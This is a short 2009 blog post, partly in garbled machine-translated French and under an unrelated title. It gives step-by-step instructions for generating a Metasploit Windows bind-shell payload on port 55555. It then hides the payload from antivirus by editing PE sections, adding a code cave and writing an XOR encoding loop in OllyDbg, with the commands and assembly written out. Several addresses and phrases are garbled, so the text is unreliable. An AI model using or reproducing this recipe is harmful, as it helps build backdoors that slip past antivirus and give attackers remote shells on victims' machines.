Friday, May 15, 2009

What To Do When You Have To Run With Your Period

Execution flow hijack + XOR encryption



*** Based On The demo made by shmoocon Muts ***

Backtrack:
msfpayload windows / shell_bind_tcp LPORT = 55555 X> bindtcp.exe

Windows:
Click on the file ==> bound hell on port 55 555
check: netstat-na find "55 555"


PEditor
. Idata: vsize: 500 - rsize: 400

hexedit:
+ 200 hex bytes


--------------
- OllyDbg -
--------------
first instructions:
00401000> 31C0 XOR EAX, EAX

00,401,002 68 34.104 million PUSH
00,401,007th 64: FF30 PUSH DWORD PTR FS: [EAX]
0040100A. 64:8920 MOV DWORD PTR FS: [EAX], ESP 0040100D
. 6A 40 PUSH 40

Code cave: 00,401,066
start: 00,401,002
end: 00401060

XOR loop:
MOV EAX, 00401002 # Start of encoding address.
XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E
INC EAX # Increase EAX
CMP EAX, 00401060 # Tests to see if we've reached the end of our enc
JLE SHORT xxx # If not, jump back to XOR command

After the loop:
XOR EAX,EAX (overwritten instructions)
JMP 00401002 (the address after the overwritten instructions)


------------------
Commentaires
------------------

1- Créer un payload bind_tcp
msfpayload windows/shell_bind_tcp LPORT=55555 X> bindtcp.exe (for example)

2 - The scanner via VirusTotal (résultat. ..)
3 - Click on the payload and verify that the port is an open
netstat-na find "55555"

4 - Run the payload in PEditor
-Modify the section. idata
vsize: 500 & rsize: 400
It must be readable, writable and executable.
-Modify the section. Text (readable, Writable and executable)
Save

5 - Open the payload with Hexedit
Add 200-byte hex
Since (initial-rsize = 200, actual-rsize = 400) 400 - 200 ==> 200. Save


6 - Starting the payload via Ollydbg
1ST-Copy instructions in notepad (to locate the instructions that will be replaced)
-Find Space for a "code cave"-
returned on the OEP (entrypoint / early ), replace the first instruction with "JMP address-of-code-cave"
-Définir/repérer the address at which to start encoding
-Définir/repérer the address to which the encoding must end, and modify the loop ASM with these addresses.
-After the loop, insert the instruction (instructions) which was replaced by JMP from the beginning.
And second end with a JMP to the address [00401002] qui suit l'instruction remplacée
Posted by admin at 9:02 AM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)